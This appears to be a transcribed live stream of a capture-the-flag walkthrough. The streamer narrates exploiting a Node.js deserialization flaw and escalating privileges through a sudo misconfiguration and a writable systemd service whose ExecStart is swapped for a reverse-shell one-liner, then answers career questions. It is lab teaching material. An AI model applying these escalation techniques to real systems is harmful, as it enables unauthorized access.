echo, and then foreground it again. Export term equals x term, 256 color. stty-a, rows 34, columns 111. stty rows 34, columns 111. Okay. All right, our shell is fully set up here. Does anyone here have audio in his Kali Linux machine? I do. My Kali Linux machine has audio. It's just you can't hear it. No questions? Funny how helpful error messages can be. Oh, definitely. I see them all the time. Verbose error messages are very helpful. You see them very commonly in real life. Verbose error messages are super common. And it gives you critical information. One time I found a real deserialization vulnerability in real life using a verbose error message. I found it was in a Node.js application, web application, not Node. It was not Node. It's .NET. An ASP.NET web application that was using XML serializer, which is another serialization library that is vulnerable to deserialization. ASP.NET returned a really, really verbose error message, which is, again, pretty common if you've ever pen tested ASP.NET. You get a whole page of a stack trace and all kinds of shit. But in this case, In this case, it became clear that it was accepting XML-related input and passing it to XML serializer. XML serializer has a payload in YSO serial, and so I was able to achieve code execution using ysoserial.net and XML serializer. YSO serial could not be used for this because YSO serial there's a version of YSO serial for Java and there's one for .NET, but not for Node, to my knowledge. Does that make sense? So verbose error messages, always look for them. Always look for errors. Let's look at groups. We're in Volnet Node. There didn't seem like there was much to this website. Is there any kind of database or anything like that? Nope. We can cat server.js. Here's the cookie. Here's that unserialized. This is where the vulnerability sits right here. This unserialized, this call to unserialize with the, it's getting your cookie, it's unbase64ing it, and then it's passing it into unserialized. Does that make sense? And if you don't have a cookie, a session cookie, it gives you one. Instead of just having the cookie, you just also, yeah, you can just do whatever. All you're trying to do is cause an error. So you can just do this. You get the same error. All you're trying to do is send it input that's going to trigger an error. You should always do this, especially with web applications, because error messages are your best friend with figuring out how an application works. A lot of times you'll get a full stack trace. You'll get a lot like SQL injection. You might get SQL injection hints. Stuff like that. So always try to just play with input to see if you get a... Alright, so this time bash history is correctly... We see this is owned by SRV Managed. This is just the node directory, it looks like. Oh man, I hope I can solve this box quick. I'm fading fast here. I'm gonna need to lie down after this, I think. I'm glad I streamed today, but I'm pushing myself a little bit here. I probably need to lay down. What is PM2? Okay, let's look at some more node shit. Some more node shit. Did we check groups? Let's do set UID binaries. NTFS 3G, is that? I think that's normal. Is that normal? I'm actually not sure. Let's check GTFO bins. It's normal? Okay, well we're checking it anyways. Yeah. Mount, that's normal. PPD is normal. Sudo, obviously normal. G, pass WD. All of these look normal to me. Yeah, I think all of those look normal. This SRV managed thing is interesting. Can we modify any stuff in there? CA cache, maybe? Tree. I guess we could try sudo attack L, although I don't normally. Oh. Well, fuck. Okay, well, that's something. So it gets us to serve manage, SERV manage. The binary is allowed to access super user. Okay. Okay, we'll do this. So we're just GTFO binsing here. mount grep shm, see if we're in an executable directory. We are. So GTF opens. Let's paste that in. Oh, I forgot to make the temp file. Let's do it the way it says. Who cares? There we go. Temp file. Do that. Oh, I forgot. I have to do sudo tac u srv manage. That did not work. Permission denied. Permission denied. Chardron, thank you so much for the first time Prime indoctrination.
Must hunt.
Welcome back. Yeah, it's probably we could try that. Chmod tac r 777/temp. Okay, so we'll see if it works now. There it goes. So yeah, you were right. I just recursively 777'd everything in temp. There we go. ID. We are SRV managed now. Okay. Okay. All right. So we're back. We're now SERV managed. Let's do sudo tac L again. See if he can do anything. Bin systemctl start VulnNet auto timer. So it looks like is this just a service? Let's see. Let's find, I can't remember the actual path at this point. There we go. Etsy systemd system VulnNet auto timer. Okay, VulnNet job service. Can I access this? I can write to this. So run VulnNet utilities every 30 minutes. But we can just restart it. Okay, so let me just remind myself what the syntax is here. Okay, so we can just do something like this. Should probably be fine. This is VulnNet job.service. God damn it. Let's hope that works. I have a TTY inside of a TTY here, and it's not going well for me. Oh, god damn it. I meant, is it Volnet Job Service? Yep. All right, so we can write to that too. Okay, so we can just change the exec start. Nano that. Okay, so we come down here and we just do the exec start business. We can get another code execution one-liner, reverse shell one-liner rather. Let's get it 8444 this time. Okay, bin bash. Okay.
A hunter must hunt.
Okay, it looks like it was modified. Is my shell dead? Okay, there we go. Okay, sudo attack L. Let's start up a reverse shell. Or listener, rather. Gen0MC, thank you so much for the 9 months of Bezos initiation into the cult. Welcome back, my friend, to the All Has Red team. Asteroid Creek, thank you for the follow. And Banan Zoo Lankferez, thank you for the follow. God, that was a mess. Chardron, thank you so much for the first time Bezos indoctrination. Thank you guys so much. Gen 0, what are we naming our baby? Okay, it's 9 months. What are we naming it? Have a good day, Medicus Maximus. Thanks for being here, my friend. Okay, so we do sudo. We do stop, and then we have to start it again, or we can just reload it, but I'm going to stop and then start it again. And that should have given us a reverse shell. It did. Excellent. Okay, any questions about that right there, chat? Any questions about that we just did there? Any questions about that privask or the serialization? What do you guys got? Oh, I didn't even put the user in here. How did you know the service could be taken over? I didn't. I just assumed it from the sudo tackl. I ran sudo tackl on... Let's exit out. Oh, fuck. I didn't have to do that. Oh, whatever. I don't think we need it anymore. I ran sudo tackl right here, and I see that we can restart the Node.js. By the looks of things, it's the Node.js server or something. So we just went to look at those files. We just went to look at those files in systemd, and we found that those files were writable. That's about it. Wait, where was user.txt? What the hell? Where's user.txt? God damn it. Okay. Okay, there's our reverse shell again. It's in serve manages folder. I don't think we ever actually looked there. There we go. Good work, team. We did it. Here, you can have the confetti and everything. Ready? There we go. We did it. Alrighty. Any questions? Let's do that. Any questions, kids? So the key vulnerability was a poor sudoers.conf. Well, I mean, like, you can't really say if it's poor or not. Maybe that user just really needs to restart the service. I would say that the service files, like the service files in the systemd folder were poorly configured. As in, you could write to the service. Just restarting the service doesn't necessarily get us anything. The fact that we could restart the service and modify the service to do something that it wasn't supposed to do, that was the key. Is this the last machine you're going to do today? Yeah, that's the last machine. I got to go lie down pretty soon. I'll stick around a little bit longer while we find someone to raid and answering questions. The key again, it was 2 vulnerabilities in one, essentially, at the end there. Essentially, it was a vulnerability. It was the fact that we could sudo to restart the service, but we could also modify the service, as in the systemd service files were writable by our user. Thank you for streaming and teaching us. Hey, I'm so happy to do it, my man. I'm so happy to do it, even on days like this when I feel like shit. I'm happy to stream. I'm just happy to be here, okay? I'm happy to have you guys here. Okay, let's see. Who are we rating? Nobody ever streams on Sunday except for me. I'm the only person who streams on Sunday. Oh, but we got the Lambda. I am not familiar with this individual. He has 80 followers, but he's doing Hack the Box right now. I'm into it. Let's do it. 80 followers, huh? He's doing some Hack the Box right now. We're gonna question. I'm a young penetration tester with a few certifications. I'm aspiring to get a degree in computer science. How valuable would you think that can be? I mean, just having a degree in anything is valuable. Having a lot of jobs will require a bachelor's degree. It doesn't necessarily matter what the bachelor's degree is in. Just having a bachelor's degree from a 4-year university is really helpful. Like, my bachelor's degree is on biology. I don't use it for fucking anything. But it's good to say that I have a degree on a resume. That way, that gets me past HR in a lot of cases. We need the cybersecurity tag. We're really pushing for it. We're pushing for it. I would say that just going for any degree from a 4-year university is going to be valuable to you. I would definitely say go for it. And if you get it in computer science, that's even better. I would just say try to get as much as you can out of it. Al did biology, then went to Air Force. Well, I did biology at the Air Force Academy, so I was already in the Air Force when I did biology. And then pen testing and then streaming won a life. Well, streaming is more of a side hustle for me now. But yeah, I do pen testing for my current profession. My full-time job is penetration testing. I'm a red teamer, but I occasionally get put on. I get put on regular penetration tests fairly frequently. I landed my PT job just a month ago, and everyone was like, you don't need it, although I actually think it could be valuable to me. Having a degree is always valuable. Just having a degree. It doesn't necessarily benefit you in a significant way to have it be in computer science. You can absolutely make it in cybersecurity without a degree in computer science. But it's going to be much easier if you have a degree in something. If you just have a degree in something, that'll be valuable to you. Obviously, computer science is a plus, but the majority of the benefit you're getting is just having the piece of paper saying that you graduated from a 4-year university. Still trying to get you with that guy for that thing? Hey, I'm always willing to do a thing with a guy, okay? EJPT, that's a good start. EJPT and CRTP. The most valuable cert is going to be OSCP. The most valuable cert is going to be OSCP every time. For a penetration tester, right now in 2022, OSCP is the most valuable cert out there for a pen tester. However, PNPT is good, EJPT is good, CRTP is good, CRTO is excellent. All those certs are good, but OSCP is going to bring you the most net value. Are there any consequences when leaving CyberSec? What do you mean by that? Leaving CyberSec? Why would you ever leave? Why would you leave cybersecurity? It depends, and I guess the answer to the question is, do you know Savitar? Yeah, I do know him. I think he interviewed me one time on his stream. It depends on where you're going to from cybersecurity. Is CYSA worth getting on the way up? It depends. I mean, the answer to most of those questions is going to be it depends. I can only speak to my personal experience. My personal experience is that I'm a red teamer penetration tester, so I know the certs that are most valuable for a red teamer and penetration tester. But then maybe that's not your goal. CYSA, there might be jobs out there that really look for CYSA. It is a blue team cert, so you'd probably be more, it'd be more valuable on the defensive side. It's not going to be not valuable. It'll certainly have some value to you, but I can't promise you it's going to be super valuable. I actually got a job with 0 questions asked about. I don't usually get questions asked about certs. They mostly will ask me scenario-based questions. Port Swigger and go, yeah, web app pen testing questions, and as a red teamer, most of my questions are like scenario based. Like, you're red teaming a client, you get access through phishing or whatever. What are you doing? Walk us through your thought process and what you're doing to compromise the rest of the network. Those are what most of my technical interview questions involve. They're not like straight up questions like explain XSS to me. They assume I know what cross-site scripting is. Because I'm an experienced pen tester. So they ask me questions about more my overarching vision, my goals. If you're presented with Whopper. Yong Lee. Is it Yongle or Yong Lee? Thank you for the follow. Cthulhu Fountain to you, my friend. Any other questions before I send you off to our good friend, the Labda? Alrighty. So bring the Labda glad tidings of Dread Cthulhu. He's doing some Hack the Box right now by the looks of things. It says Hack the Box or TryHackMe or IT Security Q&A. So he's our friend. Bring him the glad tidings of Dread Cthulhu. Get some rest. I appreciate it, man. Hopefully I'll be back to normal on Tuesday. I'm just going to go lie down right now. I've been leaning towards learning CloudSec stuff. What do you think about the future at OffSec in regards to cloud and microservices? They're definitely not going away. If anything, they're becoming more prevalent. So cloud security is a really important thing to lean into. I think that's a great idea, Who is. Thanks for the stream. Hey, thanks for being here, my man. I'm sorry you didn't get here until later on in the stream. I did stream a little bit earlier today, mostly because I wanted to get it out of the way. I wanted to stream, but I also wanted to get it out of the way so that I could rest for the rest of the day, and hopefully get better by Tuesday. Yeah, thank you guys so much for being here as always. Go to bed tonight knowing a little bit more than you did yesterday, and I'll see you guys again when the stars are right. If you guys have questions, comments, threats, bribes, or anything, feel free to reach out to me on Discord. I am monitoring Discord even though I'm sick, and I'll get back to you as soon as I can. Peace. Love you all.